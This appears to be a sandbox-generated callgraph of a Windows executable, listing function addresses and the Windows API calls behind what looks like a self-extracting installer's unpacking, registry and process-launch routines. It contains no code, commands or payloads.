7ff7d2a67c40 4 API calls 2377->2379 2380 7ff7d2a6204c 16 API calls 2378->2380 2379->2378 2380->2369 2382 7ff7d2a62447 2381->2382 2383 7ff7d2a62330 2381->2383 2976 7ff7d2a62244 GetWindowsDirectoryA 2382->2976 2385 7ff7d2a623cb RegOpenKeyExA 2383->2385 2386 7ff7d2a6233a 2383->2386 2387 7ff7d2a623c3 2385->2387 2388 7ff7d2a623fe RegQueryInfoKeyA 2385->2388 2386->2387 2389 7ff7d2a6234a RegOpenKeyExA 2386->2389 2387->2266 2390 7ff7d2a623a8 RegCloseKey 2388->2390 2389->2387 2391 7ff7d2a6237d RegQueryValueExA 2389->2391 2390->2387 2391->2390 2393 7ff7d2a61c6f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2392->2393 2395 7ff7d2a61c4c 2392->2395 2394 7ff7d2a61cec ExitWindowsEx 2393->2394 2393->2395 2394->2395 2397 7ff7d2a61c68 2394->2397 2396 7ff7d2a64dcc 24 API calls 2395->2396 2396->2397 2398 7ff7d2a68470 7 API calls 2397->2398 2399 7ff7d2a61d1a 2398->2399 2399->2259 2401 7ff7d2a6509b 2400->2401 2402 7ff7d2a62e43 2400->2402 2401->2402 2403 7ff7d2a650a4 FindResourceA LoadResource LockResource 2401->2403 2402->2280 2402->2297 2403->2402 2404 7ff7d2a650e3 memcpy_s FreeResource 2403->2404 2404->2402 2406 7ff7d2a67566 2405->2406 2429 7ff7d2a670f2 2405->2429 2407 7ff7d2a68470 7 API calls 2406->2407 2409 7ff7d2a62fb1 2407->2409 2408 7ff7d2a671ca 2408->2406 2411 7ff7d2a671e7 GetModuleFileNameA 2408->2411 2409->2296 2409->2297 2410 7ff7d2a6711d CharNextA 2410->2429 2412 7ff7d2a6721c 2411->2412 2413 7ff7d2a6720f 2411->2413 2412->2406 2481 7ff7d2a67d68 2413->2481 2415 7ff7d2a676f1 2490 7ff7d2a68648 RtlCaptureContext RtlLookupFunctionEntry 2415->2490 2418 7ff7d2a67238 CharUpperA 2419 7ff7d2a6766f 2418->2419 2418->2429 2420 7ff7d2a64dcc 24 API calls 2419->2420 2421 7ff7d2a67692 2420->2421 2422 7ff7d2a6769e CloseHandle 2421->2422 2423 7ff7d2a676aa ExitProcess 2421->2423 2422->2423 2424 7ff7d2a6739d CharUpperA 2424->2429 2425 7ff7d2a67346 CompareStringA 2425->2429 2426 7ff7d2a673fb CharUpperA 2426->2429 2427 7ff7d2a67492 CharUpperA 2427->2429 2428 7ff7d2a672d0 CharUpperA 2428->2429 2429->2406 2429->2408 2429->2410 2429->2415 2429->2418 2429->2424 2429->2425 2429->2426 2429->2427 2429->2428 2431 7ff7d2a67ce8 IsDBCSLeadByte CharNextA 2429->2431 2486 7ff7d2a67ba8 2429->2486 2431->2429 2433 7ff7d2a62213 2432->2433 2436 7ff7d2a62086 2432->2436 2434 7ff7d2a68470 7 API calls 2433->2434 2435 7ff7d2a62222 2434->2435 2435->2312 2437 7ff7d2a620dc FindFirstFileA 2436->2437 2437->2433 2445 7ff7d2a620fe 2437->2445 2438 7ff7d2a62138 lstrcmpA 2440 7ff7d2a62158 lstrcmpA 2438->2440 2441 7ff7d2a621d9 FindNextFileA 2438->2441 2439 7ff7d2a621a3 2442 7ff7d2a621b4 SetFileAttributesA DeleteFileA 2439->2442 2440->2441 2440->2445 2443 7ff7d2a621f5 FindClose RemoveDirectoryA 2441->2443 2441->2445 2442->2441 2443->2433 2444 7ff7d2a67ba8 CharPrevA 2444->2445 2445->2438 2445->2439 2445->2441 2445->2444 2446 7ff7d2a6204c 8 API calls 2445->2446 2446->2445 2451 7ff7d2a63c59 2447->2451 2454 7ff7d2a63c4f 2447->2454 2448 7ff7d2a64dcc 24 API calls 2461 7ff7d2a63f05 2448->2461 2449 7ff7d2a68470 7 API calls 2450 7ff7d2a63042 2449->2450 2450->2312 2462 7ff7d2a612ec 2450->2462 2453 7ff7d2a63db1 2451->2453 2451->2454 2451->2461 2496 7ff7d2a62834 2451->2496 2453->2454 2455 7ff7d2a63eb7 MessageBeep 2453->2455 2453->2461 2454->2448 2454->2461 2456 7ff7d2a67f04 13 API calls 2455->2456 2457 7ff7d2a63eca 2456->2457 2458 7ff7d2a63ed3 MessageBoxA 2457->2458 2459 7ff7d2a67e34 2 API calls 2457->2459 2458->2461 2459->2458 2461->2449 2463 7ff7d2a6133c 2462->2463 2464 7ff7d2a614b5 2462->2464 2528 7ff7d2a611cc LoadLibraryA 2463->2528 2465 7ff7d2a68470 7 API calls 2464->2465 2467 7ff7d2a614da 2465->2467 2467->2312 2467->2319 2469 7ff7d2a6134d GetCurrentProcess OpenProcessToken 2469->2464 2470 7ff7d2a61377 GetTokenInformation 2469->2470 2471 7ff7d2a614a0 CloseHandle 2470->2471 2472 7ff7d2a613a0 GetLastError 2470->2472 2471->2464 2472->2471 2473 7ff7d2a613b5 LocalAlloc 2472->2473 2473->2471 2474 7ff7d2a613d2 GetTokenInformation 2473->2474 2475 7ff7d2a613fc AllocateAndInitializeSid 2474->2475 2476 7ff7d2a61491 LocalFree 2474->2476 2475->2476 2480 7ff7d2a61445 2475->2480 2476->2471 2477 7ff7d2a61481 FreeSid 2477->2476 2478 7ff7d2a61452 EqualSid 2479 7ff7d2a61476 2478->2479 2478->2480 2479->2477 2480->2477 2480->2478 2480->2479 2482 7ff7d2a67dd9 2481->2482 2484 7ff7d2a67d88 2481->2484 2482->2412 2483 7ff7d2a67d90 IsDBCSLeadByte 2483->2484 2484->2483 2485 7ff7d2a67db6 CharNextA 2484->2485 2485->2482 2485->2484 2487 7ff7d2a67bc8 2486->2487 2488 7ff7d2a67bec CharPrevA 2487->2488 2489 7ff7d2a67bda 2487->2489 2488->2489 2489->2429 2491 7ff7d2a686c7 2490->2491 2492 7ff7d2a68685 RtlVirtualUnwind 2490->2492 2495 7ff7d2a68494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2491->2495 2492->2491 2497 7ff7d2a62a2f 2496->2497 2501 7ff7d2a62872 2496->2501 2499 7ff7d2a62a50 2497->2499 2500 7ff7d2a62a41 GlobalFree 2497->2500 2499->2453 2500->2499 2501->2497 2502 7ff7d2a628a5 GetFileVersionInfoSizeA 2501->2502 2507 7ff7d2a629ed GlobalUnlock 2501->2507 2508 7ff7d2a629d9 GlobalUnlock 2501->2508 2509 7ff7d2a6261c 2501->2509 2502->2501 2503 7ff7d2a628c2 GlobalAlloc 2502->2503 2503->2497 2504 7ff7d2a628e1 GlobalLock 2503->2504 2504->2497 2505 7ff7d2a628fc GetFileVersionInfoA 2504->2505 2505->2501 2506 7ff7d2a62920 VerQueryValueA 2505->2506 2506->2501 2506->2507 2507->2501 2508->2497 2510 7ff7d2a6265b CharUpperA CharNextA CharNextA 2509->2510 2511 7ff7d2a627e0 GetSystemDirectoryA 2509->2511 2512 7ff7d2a6269c 2510->2512 2513 7ff7d2a627dd 2510->2513 2514 7ff7d2a627f1 2511->2514 2515 7ff7d2a627c7 GetWindowsDirectoryA 2512->2515 2516 7ff7d2a626a6 2512->2516 2513->2511 2517 7ff7d2a62805 2514->2517 2518 7ff7d2a67ba8 CharPrevA 2514->2518 2515->2514 2521 7ff7d2a67ba8 CharPrevA 2516->2521 2519 7ff7d2a68470 7 API calls 2517->2519 2518->2517 2520 7ff7d2a62814 2519->2520 2520->2501 2522 7ff7d2a62705 RegOpenKeyExA 2521->2522 2522->2514 2523 7ff7d2a62738 RegQueryValueExA 2522->2523 2524 7ff7d2a6276b 2523->2524 2525 7ff7d2a627b4 RegCloseKey 2523->2525 2526 7ff7d2a62774 ExpandEnvironmentStringsA 2524->2526 2527 7ff7d2a62792 2524->2527 2525->2514 2526->2527 2527->2525 2529 7ff7d2a612bb 2528->2529 2530 7ff7d2a61221 GetProcAddress 2528->2530 2533 7ff7d2a68470 7 API calls 2529->2533 2531 7ff7d2a612ac FreeLibrary 2530->2531 2532 7ff7d2a6123f AllocateAndInitializeSid 2530->2532 2531->2529 2532->2531 2534 7ff7d2a61288 FreeSid 2532->2534 2535 7ff7d2a612ca 2533->2535 2534->2531 2535->2464 2535->2469 2538 7ff7d2a65050 7 API calls 2537->2538 2539 7ff7d2a660bf LocalAlloc 2538->2539 2540 7ff7d2a6610b 2539->2540 2541 7ff7d2a660dd 2539->2541 2543 7ff7d2a65050 7 API calls 2540->2543 2542 7ff7d2a64dcc 24 API calls 2541->2542 2544 7ff7d2a660fb 2542->2544 2545 7ff7d2a6611d 2543->2545 2758 7ff7d2a67700 GetLastError 2544->2758 2547 7ff7d2a6615a lstrcmpA 2545->2547 2548 7ff7d2a66121 2545->2548 2550 7ff7d2a6618a 2547->2550 2551 7ff7d2a66174 LocalFree 2547->2551 2549 7ff7d2a64dcc 24 API calls 2548->2549 2553 7ff7d2a6613f LocalFree 2549->2553 2552 7ff7d2a64dcc 24 API calls 2550->2552 2554 7ff7d2a63123 2551->2554 2555 7ff7d2a661ac LocalFree 2552->2555 2553->2554 2554->2323 2554->2324 2554->2329 2556 7ff7d2a66100 2555->2556 2556->2554 2558 7ff7d2a65050 7 API calls 2557->2558 2559 7ff7d2a66001 2558->2559 2560 7ff7d2a66006 2559->2560 2561 7ff7d2a6604a 2559->2561 2563 7ff7d2a64dcc 24 API calls 2560->2563 2562 7ff7d2a65050 7 API calls 2561->2562 2564 7ff7d2a66063 2562->2564 2570 7ff7d2a66025 2563->2570 2566 7ff7d2a6772c 13 API calls 2564->2566 2565 7ff7d2a63146 2565->2329 2571 7ff7d2a666c4 2565->2571 2567 7ff7d2a6606f 2566->2567 2567->2565 2568 7ff7d2a66073 2567->2568 2569 7ff7d2a64dcc 24 API calls 2568->2569 2569->2570 2570->2565 2572 7ff7d2a65050 7 API calls 2571->2572 2573 7ff7d2a66706 LocalAlloc 2572->2573 2574 7ff7d2a66756 2573->2574 2575 7ff7d2a66726 2573->2575 2576 7ff7d2a65050 7 API calls 2574->2576 2577 7ff7d2a64dcc 24 API calls 2575->2577 2578 7ff7d2a66768 2576->2578 2579 7ff7d2a66744 2577->2579 2580 7ff7d2a6676c 2578->2580 2581 7ff7d2a667a5 lstrcmpA LocalFree 2578->2581 2783 7ff7d2a67700 GetLastError 2579->2783 2583 7ff7d2a64dcc 24 API calls 2580->2583 2584 7ff7d2a667ec 2581->2584 2585 7ff7d2a66837 2581->2585 2588 7ff7d2a6678a LocalFree 2583->2588 2594 7ff7d2a664e4 53 API calls 2584->2594 2587 7ff7d2a66b14 2585->2587 2591 7ff7d2a6684f GetTempPathA 2585->2591 2586 7ff7d2a66749 2589 7ff7d2a6674f 2586->2589 2590 7ff7d2a67ac8 28 API calls 2587->2590 2588->2589 2592 7ff7d2a68470 7 API calls 2589->2592 2590->2589 2593 7ff7d2a66872 2591->2593 2601 7ff7d2a668a5 2591->2601 2595 7ff7d2a63153 2592->2595 2759 7ff7d2a664e4 2593->2759 2597 7ff7d2a6680c 2594->2597 2595->2329 2595->2335 2597->2589 2599 7ff7d2a66814 2597->2599 2600 7ff7d2a64dcc 24 API calls 2599->2600 2600->2586 2601->2589 2602 7ff7d2a66adb GetWindowsDirectoryA 2601->2602 2603 7ff7d2a668f9 GetDriveTypeA 2601->2603 2607 7ff7d2a66ca4 38 API calls 2602->2607 2605 7ff7d2a66916 GetFileAttributesA 2603->2605 2618 7ff7d2a66911 2603->2618 2605->2618 2607->2601 2608 7ff7d2a664e4 53 API calls 2608->2601 2609 7ff7d2a66ca4 38 API calls 2609->2618 2610 7ff7d2a66955 GetDiskFreeSpaceA 2612 7ff7d2a66983 MulDiv 2610->2612 2610->2618 2611 7ff7d2a62468 25 API calls 2611->2618 2612->2618 2613 7ff7d2a66a02 GetWindowsDirectoryA 2613->2618 2614 7ff7d2a67ba8 CharPrevA 2615 7ff7d2a66a2a GetFileAttributesA 2614->2615 2616 7ff7d2a66a40 CreateDirectoryA 2615->2616 2615->2618 2616->2618 2617 7ff7d2a66a6d SetFileAttributesA 2617->2618 2618->2589 2618->2602 2618->2603 2618->2605 2618->2609 2618->2610 2618->2611 2618->2613 2618->2614 2618->2617 2619 7ff7d2a664e4 53 API calls 2618->2619 2619->2618 2621 7ff7d2a66d3f GetDiskFreeSpaceA 2620->2621 2622 7ff7d2a66d12 2620->2622 2624 7ff7d2a66f63 memset 2621->2624 2625 7ff7d2a66d80 MulDiv 2621->2625 2623 7ff7d2a64dcc 24 API calls 2622->2623 2627 7ff7d2a66d2f 2623->2627 2834 7ff7d2a67700 GetLastError 2624->2834 2625->2624 2626 7ff7d2a66dae GetVolumeInformationA 2625->2626 2629 7ff7d2a66de6 memset 2626->2629 2630 7ff7d2a66e45 SetCurrentDirectoryA 2626->2630 2815 7ff7d2a67700 GetLastError 2627->2815 2816 7ff7d2a67700 GetLastError 2629->2816 2641 7ff7d2a66e6c 2630->2641 2632 7ff7d2a66f7b GetLastError FormatMessageA 2633 7ff7d2a66fbd 2632->2633 2636 7ff7d2a64dcc 24 API calls 2633->2636 2635 7ff7d2a66d34 2638 7ff7d2a66f41 2635->2638 2639 7ff7d2a66fd8 SetCurrentDirectoryA 2636->2639 2637 7ff7d2a66dfe GetLastError FormatMessageA 2637->2633 2640 7ff7d2a68470 7 API calls 2638->2640 2639->2638 2642 7ff7d2a6326f 2640->2642 2643 7ff7d2a66eb4 2641->2643 2645 7ff7d2a66ed8 2641->2645 2642->2329 2642->2343 2644 7ff7d2a64dcc 24 API calls 2643->2644 2644->2635 2645->2638 2817 7ff7d2a624f8 2645->2817 2648 7ff7d2a65050 7 API calls 2647->2648 2649 7ff7d2a65dab FindResourceA LoadResource LockResource 2648->2649 2650 7ff7d2a65dfc 2649->2650 2666 7ff7d2a65fcf 2649->2666 2651 7ff7d2a65e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2650->2651 2652 7ff7d2a65e56 2650->2652 2651->2652 2835 7ff7d2a65c60 #20 2652->2835 2655 7ff7d2a65e69 #20 2656 7ff7d2a65e5f 2655->2656 2657 7ff7d2a65ed1 #22 2655->2657 2660 7ff7d2a64dcc 24 API calls 2656->2660 2658 7ff7d2a65f55 2657->2658 2659 7ff7d2a65f15 #23 2657->2659 2661 7ff7d2a65f61 FreeResource 2658->2661 2663 7ff7d2a65f75 2658->2663 2659->2656 2659->2658 2662 7ff7d2a65f53 2660->2662 2661->2663 2662->2658 2664 7ff7d2a65f9f 2663->2664 2665 7ff7d2a65f81 2663->2665 2664->2666 2668 7ff7d2a65fb1 SendMessageA 2664->2668 2667 7ff7d2a64dcc 24 API calls 2665->2667 2666->2363 2667->2664 2668->2666 2670 7ff7d2a64118 2669->2670 2683 7ff7d2a6412f 2669->2683 2671 7ff7d2a65050 7 API calls 2670->2671 2671->2683 2672 7ff7d2a64145 memset 2672->2683 2673 7ff7d2a64254 2674 7ff7d2a64dcc 24 API calls 2673->2674 2675 7ff7d2a64273 2674->2675 2676 7ff7d2a644ee 2675->2676 2679 7ff7d2a68470 7 API calls 2676->2679 2678 7ff7d2a65050 7 API calls 2678->2683 2680 7ff7d2a644ff 2679->2680 2680->2353 2681 7ff7d2a645d8 2681->2676 2685 7ff7d2a645f2 RegOpenKeyExA 2681->2685 2682 7ff7d2a642f5 CompareStringA 2682->2681 2682->2683 2683->2672 2683->2673 2683->2676 2683->2678 2683->2681 2683->2682 2684 7ff7d2a644df LocalFree 2683->2684 2686 7ff7d2a64599 2683->2686 2695 7ff7d2a644ad LocalFree 2683->2695 2698 7ff7d2a641fd CompareStringA 2683->2698 2712 7ff7d2a64394 2683->2712 2847 7ff7d2a61684 2683->2847 2886 7ff7d2a61d28 memset memset RegCreateKeyExA 2683->2886 2913 7ff7d2a6473c CreateProcessA 2683->2913 2684->2676 2685->2676 2689 7ff7d2a64627 RegQueryValueExA 2685->2689 2688 7ff7d2a64dcc 24 API calls 2686->2688 2690 7ff7d2a645b8 LocalFree 2688->2690 2692 7ff7d2a6471c RegCloseKey 2689->2692 2693 7ff7d2a6466c memset GetSystemDirectoryA 2689->2693 2690->2676 2692->2676 2696 7ff7d2a6469d 2693->2696 2697 7ff7d2a646b3 2693->2697 2695->2681 2695->2683 2700 7ff7d2a67ba8 CharPrevA 2696->2700 2699 7ff7d2a6114c _vsnprintf 2697->2699 2698->2683 2703 7ff7d2a646dc RegSetValueExA 2699->2703 2700->2697 2701 7ff7d2a64574 2705 7ff7d2a64dcc 24 API calls 2701->2705 2702 7ff7d2a643a5 GetProcAddress 2704 7ff7d2a64521 2702->2704 2702->2712 2703->2692 2708 7ff7d2a64dcc 24 API calls 2704->2708 2707 7ff7d2a64597 2705->2707 2709 7ff7d2a64553 LocalFree 2707->2709 2710 7ff7d2a64544 FreeLibrary 2708->2710 2938 7ff7d2a67700 GetLastError 2709->2938 2710->2709 2712->2701 2712->2702 2713 7ff7d2a644d3 FreeLibrary 2712->2713 2714 7ff7d2a64480 FreeLibrary 2712->2714 2928 7ff7d2a679f0 2712->2928 2713->2684 2714->2695 2716 7ff7d2a65050 7 API calls 2715->2716 2717 7ff7d2a63f8b LocalAlloc 2716->2717 2718 7ff7d2a63fdd 2717->2718 2719 7ff7d2a63fad 2717->2719 2721 7ff7d2a65050 7 API calls 2718->2721 2720 7ff7d2a64dcc 24 API calls 2719->2720 2722 7ff7d2a63fcb 2720->2722 2723 7ff7d2a63fef 2721->2723 2975 7ff7d2a67700 GetLastError 2722->2975 2725 7ff7d2a63ff3 2723->2725 2726 7ff7d2a64030 lstrcmpA 2723->2726 2727 7ff7d2a64dcc 24 API calls 2725->2727 2728 7ff7d2a6404e 2726->2728 2729 7ff7d2a64098 LocalFree 2726->2729 2730 7ff7d2a64011 LocalFree 2727->2730 2731 7ff7d2a67ac8 28 API calls 2728->2731 2732 7ff7d2a63139 2729->2732 2730->2732 2733 7ff7d2a6406e LocalFree 2731->2733 2732->2323 2732->2329 2733->2732 2734->2357 2736 7ff7d2a6778a 2735->2736 2737 7ff7d2a6114c _vsnprintf 2736->2737 2743 7ff7d2a677b8 FreeResource 2736->2743 2744 7ff7d2a67803 FreeResource 2736->2744 2738 7ff7d2a677df FindResourceA 2737->2738 2739 7ff7d2a6775e LoadResource LockResource 2738->2739 2740 7ff7d2a67801 2738->2740 2739->2736 2739->2740 2741 7ff7d2a68470 7 API calls 2740->2741 2742 7ff7d2a6782e 2741->2742 2742->2346 2743->2736 2744->2740 2746 7ff7d2a65050 7 API calls 2745->2746 2747 7ff7d2a64967 LocalAlloc 2746->2747 2748 7ff7d2a649a9 2747->2748 2749 7ff7d2a64989 2747->2749 2751 7ff7d2a65050 7 API calls 2748->2751 2750 7ff7d2a64dcc 24 API calls 2749->2750 2752 7ff7d2a649a7 2750->2752 2753 7ff7d2a649bb 2751->2753 2752->2329 2754 7ff7d2a649d5 lstrcmpA 2753->2754 2755 7ff7d2a649bf 2753->2755 2754->2755 2756 7ff7d2a64a0e LocalFree 2754->2756 2757 7ff7d2a64dcc 24 API calls 2755->2757 2756->2752 2757->2756 2758->2556 2760 7ff7d2a66516 2759->2760 2763 7ff7d2a665dd 2759->2763 2790 7ff7d2a663b8 2760->2790 2762 7ff7d2a66688 2766 7ff7d2a68470 7 API calls 2762->2766 2801 7ff7d2a66b70 2763->2801 2770 7ff7d2a666a8 2766->2770 2768 7ff7d2a665cc 2773 7ff7d2a67ba8 CharPrevA 2768->2773 2769 7ff7d2a66577 GetSystemInfo 2777 7ff7d2a66591 2769->2777 2770->2589 2784 7ff7d2a62468 GetWindowsDirectoryA 2770->2784 2771 7ff7d2a6662a CreateDirectoryA 2774 7ff7d2a6667d 2771->2774 2775 7ff7d2a6663f 2771->2775 2772 7ff7d2a66649 2772->2762 2778 7ff7d2a66ca4 38 API calls 2772->2778 2773->2763 2813 7ff7d2a67700 GetLastError 2774->2813 2775->2772 2777->2768 2780 7ff7d2a67ba8 CharPrevA 2777->2780 2781 7ff7d2a6665a 2778->2781 2779 7ff7d2a66682 2779->2762 2780->2768 2781->2762 2782 7ff7d2a66666 RemoveDirectoryA 2781->2782 2782->2762 2783->2586 2785 7ff7d2a624c4 2784->2785 2786 7ff7d2a624a6 2784->2786 2788 7ff7d2a68470 7 API calls 2785->2788 2787 7ff7d2a64dcc 24 API calls 2786->2787 2787->2785 2789 7ff7d2a624df 2788->2789 2789->2601 2789->2608 2792 7ff7d2a663e3 2790->2792 2791 7ff7d2a6114c _vsnprintf 2791->2792 2792->2791 2793 7ff7d2a67ba8 CharPrevA 2792->2793 2796 7ff7d2a6644b GetTempFileNameA 2792->2796 2794 7ff7d2a66420 RemoveDirectoryA GetFileAttributesA 2793->2794 2794->2792 2795 7ff7d2a664b6 CreateDirectoryA 2794->2795 2795->2796 2797 7ff7d2a66490 2795->2797 2796->2797 2798 7ff7d2a6646b DeleteFileA CreateDirectoryA 2796->2798 2799 7ff7d2a68470 7 API calls 2797->2799 2798->2797 2800 7ff7d2a664a2 2799->2800 2800->2762 2800->2768 2800->2769 2802 7ff7d2a66b8b 2801->2802 2802->2802 2803 7ff7d2a66b94 LocalAlloc 2802->2803 2804 7ff7d2a66bb4 2803->2804 2805 7ff7d2a66bf5 2803->2805 2806 7ff7d2a64dcc 24 API calls 2804->2806 2808 7ff7d2a67ba8 CharPrevA 2805->2808 2812 7ff7d2a66bd2 2806->2812 2809 7ff7d2a66c14 CreateFileA LocalFree 2808->2809 2811 7ff7d2a66c61 CloseHandle GetFileAttributesA 2809->2811 2809->2812 2810 7ff7d2a66626 2810->2771 2810->2772 2811->2812 2812->2810 2814 7ff7d2a67700 GetLastError 2812->2814 2813->2779 2814->2810 2815->2635 2816->2637 2818 7ff7d2a62525 2817->2818 2819 7ff7d2a62562 2817->2819 2822 7ff7d2a6114c _vsnprintf 2818->2822 2820 7ff7d2a625ab 2819->2820 2821 7ff7d2a62567 2819->2821 2826 7ff7d2a6114c _vsnprintf 2820->2826 2830 7ff7d2a6255d 2820->2830 2823 7ff7d2a6114c _vsnprintf 2821->2823 2824 7ff7d2a6253d 2822->2824 2825 7ff7d2a6257f 2823->2825 2828 7ff7d2a64dcc 24 API calls 2824->2828 2831 7ff7d2a64dcc 24 API calls 2825->2831 2832 7ff7d2a625c7 2826->2832 2827 7ff7d2a68470 7 API calls 2829 7ff7d2a62609 2827->2829 2828->2830 2829->2638 2830->2827 2831->2830 2833 7ff7d2a64dcc 24 API calls 2832->2833 2833->2830 2834->2632 2836 7ff7d2a65ced 2835->2836 2837 7ff7d2a65d62 2835->2837 2838 7ff7d2a65380 29 API calls 2836->2838 2839 7ff7d2a68470 7 API calls 2837->2839 2840 7ff7d2a65d04 2838->2840 2841 7ff7d2a65d78 2839->2841 2840->2837 2842 7ff7d2a65d0d #21 2840->2842 2841->2655 2841->2656 2842->2837 2843 7ff7d2a65d28 2842->2843 2843->2837 2844 7ff7d2a65770 CloseHandle 2843->2844 2845 7ff7d2a65d4a 2844->2845 2845->2837 2846 7ff7d2a65d4f #23 2845->2846 2846->2837 2848 7ff7d2a616d3 2847->2848 2939 7ff7d2a615e8 2848->2939 2851 7ff7d2a67ba8 CharPrevA 2852 7ff7d2a61766 2851->2852 2853 7ff7d2a67d68 2 API calls 2852->2853 2854 7ff7d2a61811 2853->2854 2855 7ff7d2a61a1b 2854->2855 2856 7ff7d2a6181a CompareStringA 2854->2856 2858 7ff7d2a67d68 2 API calls 2855->2858 2856->2855 2857 7ff7d2a6184d GetFileAttributesA 2856->2857 2859 7ff7d2a61867 2857->2859 2860 7ff7d2a619f3 2857->2860 2861 7ff7d2a61a28 2858->2861 2859->2860 2864 7ff7d2a615e8 2 API calls 2859->2864 2865 7ff7d2a64dcc 24 API calls 2860->2865 2862 7ff7d2a61acb LocalAlloc 2861->2862 2863 7ff7d2a61a31 CompareStringA 2861->2863 2862->2860 2866 7ff7d2a61aeb GetFileAttributesA 2862->2866 2863->2862 2870 7ff7d2a61a60 2863->2870 2867 7ff7d2a6188b 2864->2867 2884 7ff7d2a6194f 2865->2884 2873 7ff7d2a61b01 2866->2873 2868 7ff7d2a618b5 LocalAlloc 2867->2868 2871 7ff7d2a615e8 2 API calls 2867->2871 2868->2860 2872 7ff7d2a618d7 GetPrivateProfileIntA GetPrivateProfileStringA 2868->2872 2869 7ff7d2a61bd1 2874 7ff7d2a68470 7 API calls 2869->2874 2870->2870 2875 7ff7d2a61a81 LocalAlloc 2870->2875 2871->2868 2876 7ff7d2a61984 2872->2876 2872->2884 2885 7ff7d2a61b54 2873->2885 2877 7ff7d2a61be9 2874->2877 2875->2860 2880 7ff7d2a61ab2 2875->2880 2878 7ff7d2a619ba 2876->2878 2879 7ff7d2a61995 GetShortPathNameA 2876->2879 2877->2683 2883 7ff7d2a6114c _vsnprintf 2878->2883 2879->2878 2882 7ff7d2a6114c _vsnprintf 2880->2882 2882->2884 2883->2884 2884->2869 2947 7ff7d2a62a6c 2885->2947 2887 7ff7d2a62019 2886->2887 2888 7ff7d2a61dce 2886->2888 2889 7ff7d2a68470 7 API calls 2887->2889 2891 7ff7d2a6114c _vsnprintf 2888->2891 2893 7ff7d2a61e25 2888->2893 2890 7ff7d2a62028 2889->2890 2890->2683 2892 7ff7d2a61dee RegQueryValueExA 2891->2892 2892->2888 2892->2893 2894 7ff7d2a61e29 RegCloseKey 2893->2894 2895 7ff7d2a61e46 GetSystemDirectoryA 2893->2895 2894->2887 2896 7ff7d2a67ba8 CharPrevA 2895->2896 2897 7ff7d2a61e6a LoadLibraryA 2896->2897 2898 7ff7d2a61e86 GetProcAddress FreeLibrary 2897->2898 2899 7ff7d2a61f55 GetModuleFileNameA 2897->2899 2898->2899 2901 7ff7d2a61ebe GetSystemDirectoryA 2898->2901 2900 7ff7d2a61f78 RegCloseKey 2899->2900 2904 7ff7d2a61ee8 2899->2904 2900->2887 2902 7ff7d2a61ed5 2901->2902 2901->2904 2903 7ff7d2a67ba8 CharPrevA 2902->2903 2903->2904 2904->2904 2905 7ff7d2a61f11 LocalAlloc 2904->2905 2906 7ff7d2a61f8e 2905->2906 2907 7ff7d2a61f35 2905->2907 2909 7ff7d2a6114c _vsnprintf 2906->2909 2908 7ff7d2a64dcc 24 API calls 2907->2908 2910 7ff7d2a61f53 2908->2910 2911 7ff7d2a61fc4 2909->2911 2910->2900 2911->2911 2912 7ff7d2a61fcd RegSetValueExA RegCloseKey LocalFree 2911->2912 2912->2887 2914 7ff7d2a648b3 2913->2914 2915 7ff7d2a647c2 WaitForSingleObject GetExitCodeProcess 2913->2915 2974 7ff7d2a67700 GetLastError 2914->2974 2916 7ff7d2a647f9 2915->2916 2923 7ff7d2a62318 18 API calls 2916->2923 2927 7ff7d2a6482a CloseHandle CloseHandle 2916->2927 2918 7ff7d2a648b8 GetLastError FormatMessageA 2919 7ff7d2a64dcc 24 API calls 2918->2919 2921 7ff7d2a6491c 2919->2921 2924 7ff7d2a68470 7 API calls 2921->2924 2922 7ff7d2a648aa 2922->2921 2925 7ff7d2a6484d 2923->2925 2926 7ff7d2a6492f 2924->2926 2925->2927 2926->2683 2927->2921 2927->2922 2929 7ff7d2a67a25 2928->2929 2930 7ff7d2a67ba8 CharPrevA 2929->2930 2931 7ff7d2a67a63 GetFileAttributesA 2930->2931 2932 7ff7d2a67a79 2931->2932 2933 7ff7d2a67a96 LoadLibraryA 2931->2933 2932->2933 2934 7ff7d2a67a7d LoadLibraryExA 2932->2934 2935 7ff7d2a67aa9 2933->2935 2934->2935 2936 7ff7d2a68470 7 API calls 2935->2936 2937 7ff7d2a67ab9 2936->2937 2937->2712 2938->2675 2942 7ff7d2a61609 2939->2942 2941 7ff7d2a61621 2944 7ff7d2a67ce8 2 API calls 2941->2944 2942->2941 2943 7ff7d2a61651 2942->2943 2960 7ff7d2a67ce8 2942->2960 2943->2851 2943->2852 2945 7ff7d2a6162f 2944->2945 2945->2943 2946 7ff7d2a67ce8 2 API calls 2945->2946 2946->2945 2948 7ff7d2a62aa0 GetModuleFileNameA 2947->2948 2949 7ff7d2a62c24 2947->2949 2948->2949 2959 7ff7d2a62ac8 2948->2959 2950 7ff7d2a68470 7 API calls 2949->2950 2952 7ff7d2a62c37 2950->2952 2951 7ff7d2a62acc IsDBCSLeadByte 2951->2959 2952->2869 2953 7ff7d2a62bf6 CharNextA 2955 7ff7d2a62c08 CharNextA 2953->2955 2954 7ff7d2a62af1 CharNextA CharUpperA 2956 7ff7d2a62b9b CharUpperA 2954->2956 2954->2959 2955->2949 2955->2951 2956->2959 2958 7ff7d2a62b36 CharPrevA 2958->2959 2959->2951 2959->2953 2959->2954 2959->2955 2959->2958 2965 7ff7d2a67c40 2959->2965 2963 7ff7d2a67d00 2960->2963 2961 7ff7d2a67d47 2961->2942 2962 7ff7d2a67d0a IsDBCSLeadByte 2962->2961 2962->2963 2963->2961 2963->2962 2964 7ff7d2a67d30 CharNextA 2963->2964 2964->2963 2966 7ff7d2a67c58 2965->2966 2966->2966 2967 7ff7d2a67c61 CharPrevA 2966->2967 2968 7ff7d2a67c7d CharPrevA 2967->2968 2969 7ff7d2a67c75 2968->2969 2970 7ff7d2a67c94 2968->2970 2969->2968 2969->2970 2971 7ff7d2a67cc7 2970->2971 2972 7ff7d2a67c9e CharPrevA 2970->2972 2973 7ff7d2a67cb5 CharNextA 2970->2973 2971->2959 2972->2971 2972->2973 2973->2971 2974->2918 2975->2732 2977 7ff7d2a622eb 2976->2977 2978 7ff7d2a62281 2976->2978 2980 7ff7d2a68470 7 API calls 2977->2980 2979 7ff7d2a67ba8 CharPrevA 2978->2979 2981 7ff7d2a62294 WritePrivateProfileStringA _lopen 2979->2981 2982 7ff7d2a622fd 2980->2982 2981->2977 2983 7ff7d2a622c7 _llseek _lclose 2981->2983 2982->2387 2983->2977

                                                                                                                                                                                          Callgraph

                                                                                                                                                                                          • Executed
